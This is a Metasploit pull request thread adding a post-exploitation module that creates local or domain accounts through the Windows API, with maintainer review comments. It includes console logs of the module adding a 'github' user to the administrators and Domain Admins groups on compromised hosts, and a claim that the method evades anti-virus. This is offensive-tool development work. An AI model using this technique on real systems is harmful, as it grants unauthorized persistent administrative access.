### PR TITLE
Add user with window api

### PR DESCRIPTION
**Pull request by cn-kali-team**
```
Windows local user accounts can be created
Adds additional netapi32.dll functions to def_netapi32.rb. This improves the coverage of functions offered by this DLL.
Using Windows API can bypass anti-virus software to some extent.
```
[microsoft docs](https://docs.microsoft.com/en-us/windows/win32/netmgmt/creating-a-local-group-and-adding-a-user)

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use post/windows/manage/add_user_with_api`
- [x] `set username github`
- [x] `set password MyPassWord`
- [x] `set session 1`
- [x] **Verify** Add an account to the target host

## Scenarios
```
msf5 exploit(multi/handler) > use post/windows/manage/add_user_with_api
meterpreter > shell                                                                                                                                                  [10/6580]
Process 520 created.                                                                                                                                                          
Channel 1 created.                                                                                                                                                            
Microsoft Windows XP [汾 5.1.2600]                                                                                                                                            
(C)  1985-2001 Microsoft Corp.                                                                                                                                                
                                                                                                                                                                              
C:\Documents and Settings\Administrator\\>net user
net user

\\KT-7445BC822526 û

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant            
ɡ

C:\Documents and Settings\Administrator\\>exit
exit
meterpreter > background 
[*] Backgrounding session 1...
msf5 post(windows/manage/add_user_with_api) > set session 1                             
session => 1
msf5 post(windows/manage/add_user_with_api) > set username github                       
username => github
msf5 post(windows/manage/add_user_with_api) > set password MyPassWord                   
password => MyPassWord
msf5 post(windows/manage/add_user_with_api) > run 

[+] User was added!
[*] Post module execution completed
msf5 post(windows/manage/add_user_with_api) > sessions -i 1                             
[*] Starting interaction with 1...

meterpreter > shell 
Process 1904 created.
Channel 2 created.
Microsoft Windows XP [汾 5.1.2600]
(C)  1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\\>net user
net user

\\KT-7445BC822526 û

-------------------------------------------------------------------------------
Administrator            github                   Guest                    
HelpAssistant            
ɡ

C:\Documents and Settings\Administrator\\>
```

### CODE REVIEW

**Comment by smcintyre-r7** [comment]
I think this would be better suited as an addition to the existing `post/windows/manage/add_user_domain` module. I know you're trying to add local users so the module name makes less sense but the module already has functionality to acquire the necessary privileges which could be useful in this case as well. What we could do is rename that module to reflect that it is now a bit more generic. You could then use the Windows API for adding both domain and local accounts while offering framework users a more consistent experience / interface to that action.

**Comment by cn-kali-team** [comment]
> I think this would be better suited as an addition to the existing `post/windows/manage/add_user_domain` module. I know you're trying to add local users so the module name makes less sense but the module already has functionality to acquire the necessary privileges which could be useful in this case as well. What we could do is rename that module to reflect that it is now a bit more generic. You could then use the Windows API for adding both domain and local accounts while offering framework users a more consistent experience / interface to that action.

Replace run_cmd with API in module `post/windows/manage/add_user_domain`?

**Comment by smcintyre-r7** [comment]
Replace `run_cmd`, rename it and add an option to specify if the user to add is a local user or a domain user.

When renaming modules we have a feature that allows them to be phased over so folks that are using the original name cane still reference it. See [How to deprecate a Metasploit module](https://github.com/rapid7/metasploit-framework/wiki/How-to-deprecate-a-Metasploit-module) for more details. You'd want to follow step 2a, where you specify a replacement.

File: lib/msf/core/post/windows/accounts.rb [hunk 1]
```diff
@@ -338,6 +338,87 @@ def check_dir_perms(dir, token)
...
+          when 2224 # NERR_UserExists
+            return :user_exists
+          when 2223 # NERR_GroupExists
+            return :group_exists
+          when 2351 # NERR_InvalidComputer
+            return :invalid_server
+          when 2226 # NERR_NotPrimary
+            return :not_on_primary
+          when 2245 # NERR_PasswordTooShort
+            return :invalid_password
```
Comment (dwelch-r7) [inline lib/msf/core/post/windows/accounts.rb]: Worth adding these to the api_constants? they haven't been updated in a long time now, there's a couple of other cases where the numbers are hardcoded like this too

Comment (cn-kali-team) [reply lib/msf/core/post/windows/accounts.rb]: Well, of course that's what I want too.

File: lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/api_constants.rb [hunk 2]
```diff
@@ -38135,6 +38135,39 @@ def self.add_constants(win_const_mgr)
...
+    win_const_mgr.add_const('NERR_PasswordExpired',0x000008C2)
+    win_const_mgr.add_const('NERR_PasswordCantChange',0x000008C3)
+    win_const_mgr.add_const('NERR_PasswordHistConflict',0x000008C4)
+    win_const_mgr.add_const('NERR_PasswordTooShort',0x000008C5)
+    win_const_mgr.add_const('NERR_PasswordTooRecent',0x000008C6)
+    win_const_mgr.add_const('NERR_InvalidDatabase',0x000008C7)
+    win_const_mgr.add_const('NERR_DatabaseUpToDate',0x000008C8)
+    win_const_mgr.add_const('NERR_SyncRequired',0x000008C9)
+    win_const_mgr.add_const('NERR_InvalidComputer',0x0000092F)
+    win_const_mgr.add_const('NERR_MaxLenExceeded',0x00000932)
```
Comment (dwelch-r7) [inline lib/rex/post/meterpreter/extensions/stdapi/railgun/def/windows/api_constants.rb]: Awesome, thanks @cn-kali-team these haven't been updated in a while

**Comment by cn-kali-team** [comment]
## Local Mode



- SET ADD_TO_DOMAIN **FALSE**

```
meterpreter > shell
Process 1308 created.
Channel 2 created.
Microsoft Windows [汾 6.1.7601]
 (c) 2009 Microsoft Corporation

C:\Users\Win7.KALI-TEAM.001\Desktop>net user
net user

\\WIN û

-------------------------------------------------------------------------------
Administrator            Guest                    Win7                     
ɡ


C:\Users\Win7.KALI-TEAM.001\Desktop>exit
exit
meterpreter > background 
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/windows/manage/add_user_with_api 
msf5 post(windows/manage/add_user_with_api) > set session 2
session => 2
msf5 post(windows/manage/add_user_with_api) > set add_to_domain false 
add_to_domain => false
msf5 post(windows/manage/add_user_with_api) > set username github
username => github
msf5 post(windows/manage/add_user_with_api) > set password Metasploit@123
password => Metasploit@123
msf5 post(windows/manage/add_user_with_api) > run 

[*] Running module on 'WIN'
[*] Local Mode
[*] You have not set up a group. The default is 'administrators' 
[+] User 'github' was added!
[*] The local group already exists.
[+] 'github' is now a member of the 'administrators' group!
[*] Post module execution completed
msf5 post(windows/manage/add_user_with_api) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell 
Process 3156 created.
Channel 3 created.
Microsoft Windows [汾 6.1.7601]
 (c) 2009 Microsoft Corporation

C:\Users\Win7.KALI-TEAM.001\Desktop>net user
net user

\\WIN û

-------------------------------------------------------------------------------
Administrator            github                   Guest                    
Win7                     
ɡ


C:\Users\Win7.KALI-TEAM.001\Desktop>

```

## Domain Mode

- SET ADD_TO_DOMAIN **TRUE**

```
meterpreter > background 
[*] Backgrounding session 2...
msf5 post(windows/manage/add_user_with_api) > set add_to_domain true 
add_to_domain => true
msf5 post(windows/manage/add_user_with_api) > run 

[*] Running module on 'WIN'
[*] Domain Mode
[+] Found Domain : \\WIN-A18RNMNL9C2.kali-team.cn
[*] You have not set up a group. The default is 'Domain Admins' 
[*] You have not set up a server_name. The default is '\\WIN-A18RNMNL9C2.kali-team.cn' 
[+] Domain Group Members:["Administrator", "Win7"]
[+] User 'github' was added!
[*] Group already exists.
[+] 'github' is now a member of the 'Domain Admins' group!
[+] Now,Domain Group Members:["Administrator", "Win7", "github"]
[*] Post module execution completed
msf5 post(windows/manage/add_user_with_api) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell 
Process 3972 created.
Channel 4 created.
Microsoft Windows [汾 6.1.7601]
 (c) 2009 Microsoft Corporation

C:\Users\Win7.KALI-TEAM.001\Desktop>net user /domain
net user /domain
 kali-team.cn 


\\WIN-A18RNMNL9C2.kali-team.cn û

-------------------------------------------------------------------------------
Administrator            github                   Guest                    
krbtgt                   Win7                     
ɡ


C:\Users\Win7.KALI-TEAM.001\Desktop>

```

**Comment by smcintyre-r7** [comment]
So you have the options to add to the domain or the local host, but it doesn't look like you added that functionality to the original https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/add_user_domain.rb module. The purpose of that suggestion was to update that module and consolidate the two (add_user_domain and add_user_with_api) into one simple add_user module. Easiest thing to do would be to add the Domain / Local datastore option to the other module, switch it to using the API and then rename it to simply add_user.

On a side note, I really like the changes to allocate and write up strings for both 7-bit and unicode variants.

**Comment by cn-kali-team** [comment]
> So you have the options to add to the domain or the local host, but it doesn't look like you added that functionality to the original https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/manage/add_user_domain.rb module. The purpose of that suggestion was to update that module and consolidate the two (add_user_domain and add_user_with_api) into one simple add_user module. Easiest thing to do would be to add the Domain / Local datastore option to the other module, switch it to using the API and then rename it to simply add_user.
> 
> On a side note, I really like the changes to allocate and write up strings for both 7-bit and unicode variants.

Sorry, my native language is not English, so I may not understand what your mean. Should I delete the file `add_user_domian` and rename `add_user_with_api` to `add_user`?

**Review by smcintyre-r7 — CHANGES_REQUESTED** [review]
We've started to utilize rubocop for style enforcement (and correction) would you mind please running rubocop on each of the files you've updated? Once you install `rubocop` just use `rubocop -a path/to/your/file` for each of the files you've edited and rubocop will fix as many little style things as it can.

The major logic changes I'd request is not returning `["None"]` when no members were found for various things and moving the keyword argument to the end (e.g. using `def add_localgroup(localgroup, server_name = nil)` instead of `def add_localgroup(server_name = nil, localgroup)`. This PR raises an interesting point about railgun mishandling `PDWORD` values which I'll look into but in the meantime your fix with the modulo operator is sufficient.

I really like how you went in and update the enum_domain_tokens and enable_rdp modules too, thanks alot for that!

With these changes in place, I'll get to testing this. Again thanks alot, this is some great functionality to move us away from unnecessary command invocations.

**Review by smcintyre-r7 — APPROVED** [review]
Thanks! I see all my comments were addressed so I'm going to move on to testing this.

**Review by smcintyre-r7 — APPROVED** [review]
All modules tested successfully! :tada: Use a Server 2012 instance attached to a domain controller with a meterpreter session running int he context of a DA. I checked all changed modules and :100: % are already marked as needing a Meterpreter session.

One (should be the last I promise!) change request is commented in the `add_user` module to remove the default group and avoid accidental alerts.

**Comment by smcintyre-r7** [comment]
I tested this once more and then merged this in with some minor whitespace and verbage changes in commit b3b6450958ff5f960d552204e4291ce49eb98e95. Thanks for all your work on this, using the API is a great improvement for all the relevant modules.

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds functionality to leverage the Windows APIs for managing local and domain users and groups over Meterpreter. Additionally a handful of modules are updated to utilize this functionality rather than relying on OS command execution.

**Pull request merged**